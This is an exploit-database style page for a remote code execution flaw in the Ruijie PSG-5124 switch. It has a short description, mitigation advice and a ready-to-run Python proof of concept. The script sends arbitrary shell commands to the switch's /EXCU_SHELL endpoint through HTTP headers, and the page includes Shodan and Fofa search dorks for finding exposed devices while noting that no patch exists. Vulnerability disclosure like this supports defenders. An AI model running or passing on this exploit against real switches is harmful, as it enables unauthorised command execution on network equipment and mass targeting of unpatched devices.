Ruijie Switch PSG-5124 26293 Remote Code Execution (RCE)

vendor:

Switch PSG-5124

by:

ByteHunter

6.1

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: Switch PSG-5124

Affected Version From: PSG-5124 (LINK SOFTWARE RELEASE:26293)

Affected Version To: PSG-5124 (LINK SOFTWARE RELEASE:26293)

Patch Exists: NO

Related CWE: Not specified

CPE: h:ruijie:psg-5124:26293

Metasploit:

Other Scripts:

Platforms Tested: Not specified

Not specified

Ruijie Switch PSG-5124 26293 Remote Code Execution (RCE)

The exploit allows remote attackers to execute arbitrary code on Ruijie Switch PSG-5124 version 26293. By sending a malicious request to the target IP and port, an attacker can trigger the vulnerability and run commands on the device.

Mitigation:

To mitigate this vulnerability, it is recommended to update the device to a patched version provided by the vendor. Additionally, ensure that the device is not directly accessible from untrusted networks.

Source

Exploit-DB raw data:

#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)

import http.client
import argparse

def send_request(ip, port, command):
    headers = {
        "Host": f"{ip}:{port}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cmdnum": "1",
        "Confirm1": "n",
        "Content-Length": "0",
        "Command1": command
    }

    try:
        connection = http.client.HTTPConnection(f"{ip}:{port}")
        connection.request("GET", "/EXCU_SHELL", headers=headers)
        response = connection.getresponse()

        
        print(f"Status Code: {response.status}")
        print(response.read().decode('utf-8'))
        connection.close()

    except Exception as e:
        print(f"Request failed: {e}")

if __name__ == "__main__":

    parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
    parser.add_argument('--ip', help='Target IP address', required=True)
    parser.add_argument('--port', help='Port', required=True)
    parser.add_argument('--cmd', help='Command', required=True)
    args = parser.parse_args()


    ip = args.ip
    port = args.port
    command = args.cmd


    send_request(ip, port, command)